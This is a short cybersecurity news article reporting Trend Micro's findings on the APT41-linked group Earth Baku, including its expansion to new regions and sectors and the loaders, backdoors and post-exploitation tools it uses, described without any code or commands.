August 14, 2024Ravie LakshmananThreat Intelligence / Cyber ​​Attack

China-backed threat actor Earth Baku has expanded its attack surface from the Indo-Pacific region to Europe, the Middle East and Africa, starting in late 2022.

New countries targeted as part of the activity include Italy, Germany, the UAE, and Qatar, with suspected attacks also detected in Georgia and Romania. Government, media and communications, telecom, technology, healthcare, and education are some of the sectors identified as part of the intrusion set.

“The group has updated its tools, tactics, and procedures (TTPs) in more recent campaigns, leveraging publicly available applications such as IIS servers as attack entry points and then deploying advanced malware toolsets into the victim’s environment,” Trend Micro researchers Ted Lee and Theo Chen said in an analysis published last week.

The findings build on recent reports from Zscaler and Google-owned Mandiant, which also detailed the threat actor’s use of malware families including DodgeBox (also known as DUSTPAN) and MoonWalk (also known as DUSTTRAP), which Trend Micro has dubbed StealthReacher and SneakCross.

Earth Baku, a threat actor associated with APT41, is known for using StealthVector in October 2020. Attack chains leverage public applications to drop the Godzilla web shell, which is then used to deliver follow-up payloads.

StealthReacher is classified as an improved version of the StealthVector backdoor loader responsible for the launch of SneakCross, a modular implant and a likely successor to ScrambleCross that uses Google services for its command-and-control (C2) communications.

The attacks are also characterized by the use of other post-exploitation tools such as iox, Rakshasa, and a Virtual Private Network (VPN) service known as Tailscale. Exfiltration of sensitive data to the MEGA cloud storage service is performed using a command-line utility called MEGAcmd.

“The group has deployed new loaders such as StealthVector and StealthReacher to stealthily launch backdoor components, and SneakCross is their latest modular backdoor,” the researchers said.

“Earth Baku also used several tools during the post-exploitation, including a custom iox tool, Rakshasa, TailScale for persistence, and MEGAcmd for efficient data exfiltration.”